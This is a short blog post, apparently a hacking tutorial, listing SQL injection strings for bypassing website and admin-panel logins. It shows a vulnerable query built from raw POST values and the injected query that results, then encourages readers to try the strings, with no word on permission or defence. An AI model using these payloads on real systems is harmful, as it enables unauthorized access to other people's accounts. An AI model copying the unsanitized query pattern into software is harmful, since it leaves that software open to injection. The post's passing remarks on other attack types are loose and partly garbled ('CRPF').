SQL injections:
SQL injections are used login without valid login credentials.So you could break the login of a website or even admin panel if there is not enough security .
SQL injection attack (SQLIA) is considered one of the top 10 web application vulnerabilities of 2007 and 2010
So some of the SQL Injections are
1)' or '1'='1
2)' or '1'='1' -- '
3)' or '1'='1' ({ '
4)' or '1'='1' /* '
And One Small yet very effective one: '='
These all make a query that is executed as default and thus the authentication is provided for login.
So lets see what a normal coder writes for login
SELECT * FROM users WHERE username = '$_POST['user']' AND password='$_POST['password']';
And on giving the SQL Injections Lets see What query can you Let execute and break the code written for Login.
SELECT * FROM users WHERE name = ' ' OR '1'='1' and password = '' OR '1'='1';
So if the or condition is executed the login is provided and you can easily login.
So though old yet sometimes very effective.
So if interested You could easily start trying :- ).
XSS and X path are also based on the Same concepts And use these as basic to break vulnerabilty.
There are other types like XPATH , XSS , CRPF that are dangerous but that would be in my next post .
No comments:
Post a Comment